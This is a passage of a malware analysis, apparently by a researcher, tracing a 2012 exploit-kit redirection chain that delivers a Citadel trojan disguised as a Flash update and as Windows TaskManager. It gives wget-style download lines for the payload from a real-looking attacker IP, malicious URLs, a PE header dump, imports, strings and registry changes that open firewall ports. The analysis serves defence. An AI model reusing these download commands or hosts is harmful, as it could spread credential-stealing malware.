  933. --referer="http://108.178.59.34/links/assure_numb_engineers.php"
  934. --target="http://108.178.59.34/adobe/update_flash_player.exe"
  935.  
  936. --12:40:16-- http://108.178.59.34/adobe/update_flash_player.exe
  937. => `update_flash_player.exe'
  938. Connecting to 108.178.59.34:80... connected.
  939. HTTP request sent, awaiting response... 200 OK
  940. Length: 150,616 (147K) [application/octet-stream]
  941. 12:40:18 (139.15 KB/s) - `update_flash_player.exe' saved [150616/150616] <==== CITADEL PAYLOAD
  942.  
  943.  
  944. ---------------INFECTION CROSS REFERENCE AUTOMATION------------------
  945. [2012-10-17 12:42:46] [MongoDB] MongoDB instance not available
  946. [2012-10-17 12:42:47] [HTTP] URL: http://www.nikecup.net/MSmxYk/index.html (Status: 200, Referrer: None)
  947. [2012-10-17 12:42:47] [HTTP] URL: http://www.nikecup.net/MSmxYk/index.html (Content-type: text/html, MD5: ad967ba32c54c59db0f4a947410d96f2)
  948. [2012-10-17 12:42:52] [HTTP] URL: http://alpuyecamorelos.com/dycYbDyw/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
  949. [2012-10-17 12:42:52] [HTTP] URL: http://alpuyecamorelos.com/dycYbDyw/js.js (Content-type: application/javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
  950. [2012-10-17 12:42:52] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
  951. [2012-10-17 12:42:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
  952. [2012-10-17 12:42:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
  953. [2012-10-17 12:43:04] [HTTP] URL: http://videorender.com.ar/kSWEngwv/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
  954. [2012-10-17 12:43:04] [HTTP] URL: http://videorender.com.ar/kSWEngwv/js.js (Content-type: application/javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
  955. [2012-10-17 12:43:04] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
  956. [2012-10-17 12:43:04] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
  957. [2012-10-17 12:43:04] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
  958. [2012-10-17 12:43:41] [HTTP] URL: http://jbrnh.com/3ZKtSw8d/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
  959. [2012-10-17 12:43:41] [HTTP] URL: http://jbrnh.com/3ZKtSw8d/js.js (Content-type: application/x-javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
  960. [2012-10-17 12:43:41] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
  961. [2012-10-17 12:43:42] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
  962. [2012-10-17 12:43:42] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
  963. [2012-10-17 12:43:51] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
  964. [2012-10-17 12:43:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
  965. [2012-10-17 12:43:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
  966.  
  967.  
  968. -----------------------------
  969.  
  970. 0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
  971. 0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
  972. 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
  973. 0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
  974. 0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
  975. 0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
  976. 0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
  977. 0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
  978. 0080 50 45 00 00 4C 01 04 00 2A 26 7E 50 00 00 00 00 PE..L...*&~P....
  979. 0090 00 00 00 00 E0 00 0E 01 0B 01 02 32 00 A6 01 00 ...........2....
  980.  
  981.  
  982. Bin:
  983. //Pic:
  984.  
  985. // faking windoz app:
  986.  
  987. UninitializedDataSize....: 0
  988. InitializedDataSize......: 23040
  989. ImageVersion.............: 0.0
  990. ProductName..............: Microsoft(R) Windows (R) 2000 Operating System
  991. FileVersionNumber........: 5.0.2137.1
  992. LanguageCode.............: English (U.S.)
  993. FileFlagsMask............: 0x003f
  994. FileDescription..........: Windows TaskManager
  995. CharacterSet.............: Unicode
  996. LinkerVersion............: 2.5
  997. FileOS...................: Windows NT 32-bit
  998. MIMEType.................: application/octet-stream
  999. Subsystem................: Windows GUI
  1000. FileVersion..............: 5.00.2137.1
  1001. TimeStamp................: 2012:10:17 04:29:46+01:00
  1002. FileType.................: Win32 EXE
  1003. PEType...................: PE32
  1004. InternalName.............: taskmgr
  1005. ProductVersion...........: 5.00.2137.1
  1006. SubsystemVersion.........: 4.0
  1007. OSVersion................: 4.0
  1008. OriginalFilename.........: taskmgr.exe
  1009. LegalCopyright...........: Copyright (C) Microsoft Corp. 1991-1999
  1010. MachineType..............: Intel 386 or later, and compatibles
  1011. CompanyName..............: Microsoft Corporation
  1012. CodeSize.................: 108032
  1013. FileSubtype..............: 0
  1014. ProductVersionNumber.....: 5.0.2137.1
  1015. EntryPoint...............: 0x1ef0
  1016. ObjectFileType...........: Executable application
  1017.  
  1018. //Sigcheck
  1019.  
  1020. publisher................: Microsoft Corporation
  1021. product..................: Microsoft(R) Windows (R) 2000 Operating System
  1022. internal name............: taskmgr
  1023. copyright................: Copyright (C) Microsoft Corp. 1991-1999
  1024. original name............: taskmgr.exe
  1025. file version.............: 5.00.2137.1
  1026. description..............: Windows TaskManager
  1027.  
  1028.  
  1029. .text 4096 107728 108032 7.49 7bb7c23fbff31a0f4dc8c2082f47d453
  1030. .data 114688 13048 12800 1.62 bfd92f96b4b275e9bdc8941a0ac85831
  1031. .rsrc 131072 8368 8704 3.36 210a8ec34d58b64a2531c59aa8344586
  1032. .reloc 143360 516 1024 3.94 1841b4a61bd8a2498e642d7a36c6d596
  1033.  
  1034. Compiled by: Borland Delphi 3.0
  1035. Compile Time: 2012-10-17 12:29:46
  1036. Packed entropy: Entropy 7.48782313568
  1037. Name: .text
  1038. Misc: 0x1A4D0
  1039. Misc_PhysicalAddress: 0x1A4D0
  1040. Misc_VirtualSize: 0x1A4D0
  1041. VirtualAddress: 0x1000
  1042. SizeOfRawData: 0x1A600
  1043. PointerToRawData: 0x400
  1044. PointerToRelocations: 0x0
  1045. PointerToLinenumbers: 0x0
  1046. NumberOfRelocations: 0x0
  1047. NumberOfLinenumbers: 0x0
  1048. Characteristics: 0x60000020
  1049.  
  1050.  
  1051. LangID: 040904B0
  1052.  
  1053. LegalCopyright: Copyright (C) Microsoft Corp. 1991-1999
  1054. InternalName: taskmgr
  1055. FileVersion: 5.00.2137.1
  1056. CompanyName: Microsoft Corporation
  1057. ProductName: Microsoft(R) Windows (R) 2000 Operating System
  1058. ProductVersion: 5.00.2137.1
  1059. FileDescription: Windows TaskManager
  1060. OriginalFilename: taskmgr.exe
  1061.  
  1062. ------------------
  1063.  
  1064. imported calls DLL
  1065.  
  1066. -------------------
  1067.  
  1068. 0041EA0C GetCPInfo KERNEL32
  1069. 0041EA10 VirtualAlloc KERNEL32
  1070. 0041EA14 LoadLibraryA KERNEL32
  1071. 0041EA18 GetProcAddress KERNEL32
  1072. 0041EA1C GetWindowsDirectoryW KERNEL32
  1073. 0041EA20 lstrcatW KERNEL32
  1074. 0041EA24 CreateFileW KERNEL32
  1075. 0041EA2C LoadIconA USER32
  1076. 0041EA30 CreateIconIndirect USER32
  1077. 0041EA34 GetDlgCtrlID USER32
  1078. 0041EA38 GetScrollPos USER32
  1079. 0041EA3C RegisterDeviceNotificationA USER32
  1080. 0041EA40 DdeEnableCallback USER32
  1081. 0041EA44 DrawStateA USER32
  1082. 0041EA48 MessageBoxIndirectW USER32
  1083. 0041EA4C LoadMenuA USER32
  1084. 0041EA50 GetTabbedTextExtentA USER32
  1085. 0041EA54 UnpackDDElParam USER32
  1086. 0041EA58 DialogBoxIndirectParamW USER32
  1087. 0041EA5C ToAsciiEx USER32
  1088. 0041EA60 IsWindow USER32
  1089. 0041EA64 LoadKeyboardLayoutA USER32
  1090. 0041EA68 GetCursor USER32
  1091. 0041EA6C UserHandleGrantAccess USER32
  1092. 0041EA70 GetMenuState USER32
  1093. 0041EA74 SetMenuItemInfoA USER32
  1094. 0041EA78 TabbedTextOutW USER32
  1095. 0041EA7C mouse_event USER32
  1096. 0041EA80 DdeSetUserHandle USER32
  1097. 0041EA84 SetWindowWord USER32
  1098. 0041EA88 SetDlgItemTextW USER32
  1099. 0041EA8C IsMenu USER32
  1100. 0041EA90 SetWindowTextW USER32
  1101. 0041EA94 GetSystemMenu USER32
  1102. 0041EA98 RegisterClassA USER32
  1103. 0041EA9C ChangeDisplaySettingsExW USER32
  1104. 0041EAA0 SetMenuInfo USER32
  1105. 0041EAA4 GetKeyState USER32
  1106. 0041EAA8 ChildWindowFromPoint USER32
  1107. 0041EAAC LoadCursorFromFileW USER32
  1108. 0041EAB0 SendMessageCallbackA USER32
  1109. 0041EAB4 DdeKeepStringHandle USER32
  1110. 0041EAB8 FlashWindow USER32
  1111. 0041EABC OpenIcon USER32
  1112. 0041EAC0 CreateMenu USER32
  1113. 0041EAC4 FindWindowW USER32
  1114. 0041EAC8 GetIconInfo USER32
  1115. 0041EACC GetWindowInfo USER32
  1116. 0041EAD0 IsCharAlphaNumericA USER32
  1117. 0041EAD4 FrameRect USER32
  1118. 0041EAD8 FlashWindowEx USER32
  1119. 0041EADC SetSysColors USER32
  1120. 0041EAE0 GetCapture USER32
  1121. 0041EAE4 DdeGetLastError USER32
  1122. 0041EAE8 SetWindowsHookA USER32
  1123. 0041EAEC PostThreadMessageA USER32
  1124. 0041EAF0 TranslateMessage USER32
  1125. 0041EAF4 GetDlgItemTextA USER32
  1126. 0041EAF8 GetShellWindow USER32
  1127. 0041EAFC CreateAcceleratorTableW USER32
  1128. 0041EB00 DrawMenuBar USER32
  1129. 0041EB04 DdeDisconnect USER32
  1130. 0041EB08 SetClipboardData USER32
  1131. 0041EB0C CreateDialogParamW USER32
  1132. 0041EB10 ToUnicodeEx USER32
  1133. 0041EB14 CreatePopupMenu USER32
  1134. 0041EB18 IMPQueryIMEA USER32
  1135. 0041EB1C CloseWindowStation USER32
  1136. 0041EB20 GetGuiResources USER32
  1137. 0041EB24 GetPropW USER32
  1138. 0041EB28 SetActiveWindow USER32
  1139. 0041EB2C CharNextExA USER32
  1140. 0041EB30 IsRectEmpty USER32
  1141. 0041EB34 LockSetForegroundWindow USER32
  1142. 0041EB38 SetScrollRange USER32
  1143. 0041EB3C EnumPropsExW USER32
  1144. 0041EB40 PostMessageA USER32
  1145. 0041EB44 GetClassInfoExW USER32
  1146. 0041EB48 UpdateWindow USER32
  1147. 0041EB4C GetFocus USER32
  1148. 0041EB50 GetWindow USER32
  1149. 0041EB54 PaintDesktop USER32
  1150. 0041EB58 GetKeyboardLayout USER32
  1151. 0041EB5C ChangeMenuA USER32
  1152. 0041EB60 GetThreadDesktop USER32
  1153. 0041EB64 CharLowerBuffW USER32
  1154. 0041EB6C RegOpenKeyExW ADVAPI32
  1155.  
  1156.  
  1157. --------------
  1158.  
  1159. stringzzz
  1160.  
  1161. --------------
  1162. .text:004157E4 00000013 C 3「H4j.JYb-菫ツ\n驟ヘ
  1163. .data:0041C02C 0000000C C CreateFileW
  1164. .data:0041C038 00000009 C kernel32
  1165. .data:0041EB76 0000000A C GetCPInfo
  1166. .data:0041EB82 0000000D C VirtualAlloc
  1167. .data:0041EB92 0000000D C LoadLibraryA
  1168. .data:0041EBA2 0000000F C GetProcAddress
  1169. .data:0041EBB4 00000015 C GetWindowsDirectoryW
  1170. .data:0041EBCC 00000009 C lstrcatW
  1171. .data:0041EBD8 0000000C C CreateFileW
  1172. .data:0041EBE4 0000000D C KERNEL32.dll
  1173. .data:0041EBF4 0000000A C LoadIconA
  1174. .data:0041EC00 00000013 C CreateIconIndirect
  1175. .data:0041EC16 0000000D C GetDlgCtrlID
  1176. .data:0041EC26 0000000D C GetScrollPos
  1177. .data:0041EC36 0000001C C RegisterDeviceNotificationA
  1178. .data:0041EC54 00000012 C DdeEnableCallback
  1179. .data:0041EC68 0000000B C DrawStateA
  1180. .data:0041EC76 00000014 C MessageBoxIndirectW
  1181. .data:0041EC8C 0000000A C LoadMenuA
  1182. .data:0041EC98 00000015 C GetTabbedTextExtentA
  1183. .data:0041ECB0 00000010 C UnpackDDElParam
  1184. .data:0041ECC2 00000018 C DialogBoxIndirectParamW
  1185. .data:0041ECDC 0000000A C ToAsciiEx
  1186. .data:0041ECE8 00000009 C IsWindow
  1187. .data:0041ECF4 00000014 C LoadKeyboardLayoutA
  1188. .data:0041ED0A 0000000A C GetCursor
  1189. .data:0041ED16 00000016 C UserHandleGrantAccess
  1190. .data:0041ED2E 0000000D C GetMenuState
  1191. .data:0041ED3E 00000011 C SetMenuItemInfoA
  1192. .data:0041ED52 0000000F C TabbedTextOutW
  1193. .data:0041ED64 0000000C C mouse_event
  1194. .data:0041ED72 00000011 C DdeSetUserHandle
  1195. .data:0041ED86 0000000E C SetWindowWord
  1196. .data:0041ED96 00000010 C SetDlgItemTextW
  1197. .data:0041EDA8 00000007 C IsMenu
  1198. .data:0041EDB2 0000000F C SetWindowTextW
  1199. .data:0041EDC4 0000000E C GetSystemMenu
  1200. .data:0041EDD4 0000000F C RegisterClassA
  1201. .data:0041EDE6 00000019 C ChangeDisplaySettingsExW
  1202. .data:0041EE02 0000000C C SetMenuInfo
  1203. .data:0041EE10 0000000C C GetKeyState
  1204. .data:0041EE1E 00000015 C ChildWindowFromPoint
  1205. .data:0041EE36 00000014 C LoadCursorFromFileW
  1206. .data:0041EE4C 00000015 C SendMessageCallbackA
  1207. .data:0041EE64 00000014 C DdeKeepStringHandle
  1208. .data:0041EE7A 0000000C C FlashWindow
  1209. .data:0041EE88 00000009 C OpenIcon
  1210. .data:0041EE94 0000000B C CreateMenu
  1211. .data:0041EEA2 0000000C C FindWindowW
  1212. .data:0041EEB0 0000000C C GetIconInfo
  1213. .data:0041EEBE 0000000E C GetWindowInfo
  1214. .data:0041EECE 00000014 C IsCharAlphaNumericA
  1215. .data:0041EEE4 0000000A C FrameRect
  1216. .data:0041EEF0 0000000E C FlashWindowEx
  1217. .data:0041EF00 0000000D C SetSysColors
  1218. .data:0041EF10 0000000B C GetCapture
  1219. .data:0041EF1E 00000010 C DdeGetLastError
  1220. .data:0041EF30 00000010 C SetWindowsHookA
  1221. .data:0041EF42 00000013 C PostThreadMessageA
  1222. .data:0041EF58 00000011 C TranslateMessage
  1223. .data:0041EF6C 00000010 C GetDlgItemTextA
  1224. .data:0041EF7E 0000000F C GetShellWindow
  1225. .data:0041EF90 00000018 C CreateAcceleratorTableW
  1226. .data:0041EFAA 0000000C C DrawMenuBar
  1227. .data:0041EFB8 0000000E C DdeDisconnect
  1228. .data:0041EFC8 00000011 C SetClipboardData
  1229. .data:0041EFDC 00000013 C CreateDialogParamW
  1230. .data:0041EFF2 0000000C C ToUnicodeEx
  1231. .data:0041F000 00000010 C CreatePopupMenu
  1232. .data:0041F012 0000000D C IMPQueryIMEA
  1233. .data:0041F022 00000013 C CloseWindowStation
  1234. .data:0041F038 00000010 C GetGuiResources
  1235. .data:0041F04A 00000009 C GetPropW
  1236. .data:0041F056 00000010 C SetActiveWindow
  1237. .data:0041F068 0000000C C CharNextExA
  1238. .data:0041F076 0000000C C IsRectEmpty
  1239. .data:0041F084 00000018 C LockSetForegroundWindow
  1240. .data:0041F09E 0000000F C SetScrollRange
  1241. .data:0041F0B0 0000000D C EnumPropsExW
  1242. .data:0041F0C0 0000000D C PostMessageA
  1243. .data:0041F0D0 00000010 C GetClassInfoExW
  1244. .data:0041F0E2 0000000D C UpdateWindow
  1245. .data:0041F0F2 00000009 C GetFocus
  1246. .data:0041F0FE 0000000A C GetWindow
  1247. .data:0041F10A 0000000D C PaintDesktop
  1248. .data:0041F11A 00000012 C GetKeyboardLayout
  1249. .data:0041F12E 0000000C C ChangeMenuA
  1250. .data:0041F13C 00000011 C GetThreadDesktop
  1251. .data:0041F150 0000000F C CharLowerBuffW
  1252. .data:0041F160 0000000B C USER32.dll
  1253. .data:0041F16E 0000000E C RegOpenKeyExW
  1254. .data:0041F17C 0000000D C ADVAPI32.dll
  1255. .rsrc:00420004 00000005 C *&~P
  1256. .rsrc:0042002C 00000005 C *&~P
  1257. .rsrc:004200BC 00000005 C *&~P
  1258. .rsrc:004200E4 00000005 C *&~P
  1259. .rsrc:0042010C 00000005 C *&~P
  1260. .rsrc:00420134 00000005 C *&~P
  1261. .rsrc:0042015C 00000005 C *&~P
  1262. .rsrc:00420184 00000005 C *&~P
  1263. .rsrc:004201AC 00000005 C *&~P
  1264. .rsrc:004201D4 00000005 C *&~P
  1265. .rsrc:004201FC 00000005 C *&~P
  1266. .rsrc:00420224 00000005 C *&~P
  1267. .rsrc:0042024C 00000005 C *&~P
  1268. .rsrc:00420274 00000005 C *&~P
  1269. .rsrc:0042029C 00000005 C *&~P
  1270. .rsrc:004202C4 00000005 C *&~P
  1271. .rsrc:004202EC 00000005 C *&~P
  1272. .rsrc:00420314 00000005 C *&~P
  1273. .rsrc:0042033C 00000005 C *&~P
  1274. .rsrc:004203BC 00000005 C *&~P
  1275. .rsrc:004203E4 00000005 C *&~P
  1276. .rsrc:0042040C 00000005 C *&~P
  1277. .rsrc:00420434 00000005 C *&~P
  1278. .rsrc:0042045C 00000005 C *&~P
  1279. .rsrc:00420484 00000005 C *&~P
  1280. .rsrc:004204AC 00000005 C *&~P
  1281. .rsrc:004204D4 00000005 C *&~P
  1282. .rsrc:004204FC 00000005 C *&~P
  1283. .rsrc:00420524 00000005 C *&~P
  1284. .rsrc:0042054C 00000005 C *&~P
  1285. .rsrc:00420574 00000005 C *&~P
  1286. .rsrc:0042059C 00000005 C *&~P
  1287. .rsrc:004205C4 00000005 C *&~P
  1288. .rsrc:004205EC 00000005 C *&~P
  1289. .rsrc:00420604 00000005 C *&~P
  1290. .rsrc:004207D9 0000000D C wwwwwwwwwwwwx
  1291. .rsrc:004207E9 0000000D C wwwwwwwwwwwwx
  1292. .rsrc:004207F9 0000000D C w\"wwwwwwwxwwx
  1293. .rsrc:0042080B 00000006 C wwwwp
  1294. .rsrc:00420819 00000007 C wwwwwwx
  1295. .rsrc:00420829 0000000D C wwwwwwwwwwwwx
  1296. .rsrc:0042087B 0000000A C wwwwwwwwwx
  1297. .rsrc:0042096B 0000000A C wwwwwwwwwx
  1298. .rsrc:0042098A 0000000A C \bwwwwwwwww
  1299. .rsrc:0042099C 00000009 C wwpwwwwww
  1300. .rsrc:00420AD1 0000000E C wwwwwwwwwwwwww
  1301. .rsrc:00420C11 0000000E C wwwwwwwwwwwwww
  1302. .rsrc:00420C21 0000000B C DDDDDDDDD@
  1303. .rsrc:00420C31 0000000E C DDDDDDDDDGpw\ap
  1304. .rsrc:00420C41 0000000E C DDDDDDDDDGpw\ap
  1305. .rsrc:00420C51 0000000E C DDDDDDDDDDDDDD
  1306. .rsrc:00420C61 0000000E C wwwwwwwwwwwwww
  1307. .rsrc:00420DE9 00000006 C DDDDDD
  1308. .rsrc:00420DF1 00000006 C wwwwww
  1309. .rsrc:00420ECA 00000006 C /
  1310. .rsrc:00420ED2 00000006 C \"\"\"\"/
  1311. .rsrc:00420EDA 00000006 C /
  1312. .rsrc:00420EE2 00000006 C \"\"\"\"/
  1313. .rsrc:00420EEA 00000006 C /
  1314. .rsrc:00420EF2 00000006 C \"\"\"\"/
  1315. .rsrc:00420EFA 00000006 C /
  1316. .rsrc:00420F02 00000006 C \"\"\"\"/
  1317. .rsrc:00420F0A 00000006 C /
  1318. .rsrc:00420F12 00000006 C \"\"\"\"/
  1319. .rsrc:00420F1A 00000006 C /
  1320. .rsrc:00420FFA 00000006 C \"\"\"\"/
  1321. .rsrc:00421002 00000006 C /
  1322. .rsrc:0042100A 00000006 C \"\"\"\"/
  1323. .rsrc:00421012 00000006 C /
  1324. .rsrc:0042101A 00000006 C \"\"\"\"/
  1325. .rsrc:00421022 00000006 C /
  1326. .rsrc:0042102A 00000006 C \"\"\"\"/
  1327. .rsrc:00421032 00000006 C /
  1328. .rsrc:0042103A 00000006 C \"\"\"\"/
  1329. .rsrc:00421042 00000006 C /
  1330. .rsrc:0042112A 00000006 C /
  1331. .rsrc:00421132 00000006 C \"\"\"\"/
  1332. .rsrc:0042113A 00000006 C /
  1333. .rsrc:00421142 00000006 C \"\"\"\"/
  1334. .rsrc:0042114A 00000006 C /
  1335. .rsrc:00421152 00000006 C \"\"\"\"/
  1336. .rsrc:0042115A 00000006 C /
  1337. .rsrc:00421162 00000006 C \"\"\"\"/
  1338. .rsrc:0042116A 00000006 C /
  1339. .rsrc:0042125A 00000006 C \"\"\"\"/
  1340. .rsrc:00421262 00000006 C /
  1341. .rsrc:0042126A 00000006 C \"\"\"\"/
  1342. .rsrc:00421272 00000006 C /
  1343. .rsrc:0042127A 00000006 C \"\"\"\"/
  1344. .rsrc:00421282 00000006 C /
  1345. .rsrc:0042128A 00000006 C \"\"\"\"/
  1346. .rsrc:00421292 00000006 C /
  1347. .rsrc:0042138A 00000006 C /
  1348. .rsrc:00421392 00000006 C \"\"\"\"/
  1349. .rsrc:0042139A 00000006 C /
  1350. .rsrc:004213A2 00000006 C \"\"\"\"/
  1351. .rsrc:004213AA 00000006 C /
  1352. .rsrc:004213B2 00000006 C \"\"\"\"/
  1353. .rsrc:004213BA 00000006 C /
  1354. .rsrc:004214BA 00000006 C \"\"\"\"/
  1355. .rsrc:004214C2 00000006 C /
  1356. .rsrc:004214CA 00000006 C \"\"\"\"/
  1357. .rsrc:004214D2 00000006 C /
  1358. .rsrc:004214DA 00000006 C \"\"\"\"/
  1359. .rsrc:004214E2 00000006 C /
  1360. .rsrc:004215EA 00000006 C /
  1361. .rsrc:004215F2 00000006 C \"\"\"\"/
  1362. .rsrc:004215FA 00000006 C /
  1363. .rsrc:00421602 00000006 C \"\"\"\"/
  1364. .rsrc:0042160A 00000006 C /
  1365. .rsrc:0042171A 00000006 C \"\"\"\"/
  1366. .rsrc:00421722 00000006 C /
  1367. .rsrc:0042172A 00000006 C \"\"\"\"/
  1368. .rsrc:00421732 00000006 C /
  1369. .rsrc:0042184A 00000006 C /
  1370. .rsrc:00421852 00000006 C \"\"\"\"/
  1371. .rsrc:0042185A 00000006 C /
  1372. .rsrc:0042197A 00000006 C \"\"\"\"/
  1373. .rsrc:00421982 00000006 C /
  1374. .rsrc:00421AAA 00000006 C /
  1375.  
  1376.  
  1377.  
  1378.  
  1379. =====================
  1380. behavior check:
  1381. =====================
  1382. Self deleted,
  1383. drops: 1154656.exe payload (self copied), and using CMD command to self exec
  1384. see pic. https://lh3.googleusercontent.com/-XdS_YZJvyKk/UH46i1qRPUI/AAAAAAAAGQk/H9mKzI08TLc/s541/004.jpg
  1385.  
  1386. REGISTRY:
  1387.  
  1388. ----------------------------------
  1389. Keys added:26
  1390. ----------------------------------
  1391. HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141
  1392. HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000
  1393. HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control
  1394. HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts
  1395. HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List
  1396. HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141
  1397. HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000
  1398. HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control
  1399. HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts
  1400. HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List
  1401. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv
  1402. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv
  1403. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList
  1404. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager
  1405. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts
  1406. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC
  1407. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot
  1408. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign
  1409. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere
  1410. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil
  1411. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB
  1412. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB\WAB4
  1413. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB\WAB4\Wab File Name
  1414. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Sysinternals
  1415. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Sysinternals\Process Explorer
  1416. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\WinRAR
  1417. ----------------------------------
  1418. Values added:112
  1419. ----------------------------------
  1420. HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control\*NewlyCreated*: 0x00000000
  1421. HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control\ActiveService: "PROCEXP141"
  1422. HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Service: "PROCEXP141"
  1423. HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Legacy: 0x00000001
  1424. HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\ConfigFlags: 0x00000000
  1425. HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Class: "LegacyDriver"
  1426. HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
  1427. HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\DeviceDesc: "PROCEXP141"
  1428. HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\NextInstance: 0x00000001
  1429. HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
  1430. HKLM\SYSTEM\ControlSet001\Services\RemoteAccess\Performance\Error Count: 0x00000002
  1431. HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications: 0x00000000
  1432. HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\24599:UDP: "24599:UDP:*:Enabled:UDP 24599"
  1433. HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\14780:TCP: "14780:TCP:*:Enabled:TCP 14780"
  1434. HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control\*NewlyCreated*: 0x00000000
  1435. HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control\ActiveService: "PROCEXP141"
  1436. HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Service: "PROCEXP141"
  1437. HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Legacy: 0x00000001
